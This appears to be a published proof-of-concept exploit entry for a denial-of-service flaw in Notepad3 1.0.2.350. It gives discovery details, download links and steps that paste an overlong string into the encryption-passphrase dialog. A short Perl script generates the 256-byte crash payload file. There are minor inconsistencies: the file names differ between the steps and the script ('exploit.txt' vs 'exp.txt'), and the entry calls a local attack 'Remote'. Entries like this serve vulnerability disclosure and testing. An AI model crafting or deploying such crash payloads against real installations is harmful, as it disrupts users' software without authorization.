# Exploit Title: Notepad3 1.0.2.350 # Discovery by: Fernando Mengali # Discovery Date: 22 january 2024 # Vendor Homepage: http://www.rizonesoft.com/ # Software Link: https://netix.dl.sourceforge.net/project/notepad3/Notepad3%20Build%20350/Notepad3-1.0.2.350.exe # Software Link: https://datapacket.dl.sourceforge.net/project/notepad3/Notepad3%20Build%20350/Notepad3-1.0.2.350_x86.zip # Notification vendor: No reported # Tested on: Window XP Professional - Service Pack 2 and 3 - English # Vulnerability Type: Remote - Denial of Service (DoS) # Steps to Produce the Exploit: # 1 - Execute script # 2 - Copy content exploit.txt # 3 - File => Set Encryption Passphrase # 4 - Encrypt using Passphrase # 4 - Denied of Service #2. Proof of Concept - PoC #!/usr/bin/perl my $exploit = "A" x 256; eval { open(my $f, '>', 'exp.txt') or die "Cannot open file: $!"; print "[+] Creating " . length($exploit) . " bytes.\n"; print $f $exploit; close $f; print "[+] Exploit file created!\n"; }; if ($@) { print "File cannot be created.\n"; }